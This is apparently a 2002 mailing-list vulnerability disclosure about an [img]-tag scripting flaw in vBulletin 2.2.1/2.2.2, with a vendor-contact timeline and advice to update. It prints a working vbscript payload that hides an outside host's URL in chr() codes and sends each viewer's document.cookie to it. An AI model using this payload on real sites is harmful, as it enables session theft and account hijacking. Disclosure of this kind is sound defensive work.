[img]-vulnerability in vBulletin Version 2.2.2 & 2.2.1 & maybe olders

[Cano2 <Cano2 () buhaboard de>]

Hi

I've discovered a vulnerability in the vBulletins's [img]-Tag
implementation,
that allows users to inject vbs-code in posts and private messages
([img] is switched on by default).
Through that, an attacker is able to steal other users cookies and
maybe hijack their accounts.

The following code sends the user's cookie to a php-script
(http://www.ignite.barrysworld.net/test.php?c= in this case, which
just prints it back to the browser)
It is enclosed in [code]-Tag, the url is encoded in ascii and
linebreaks are inserted to avoid filtering of some characters and
insertion of <br>-Tags

[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)[/img][/code]
  

History:
 Feb 19 02: contacted Jelsoft
 Feb 20 02: Vendor confirmed the bug
 Feb 21 02: Jelsoft claimed to have made a patch "which clamps
            down on what characters are allowed in an [img] tag,
            as well as requiring it to start with http://";.
            Sounds good ;)


 vBulletin 2.2.3 & 2.2.4 are out for some weeks, but there are still
 sites using vulnerable versions, so better update!
 

lates, Cano2                          mailto:Cano2 () buhaboard de

--
Wirklich reich sind die, die mehr Träume haben als die Realität zerstören kann

BuHa-Security Board
www.buhaboard.de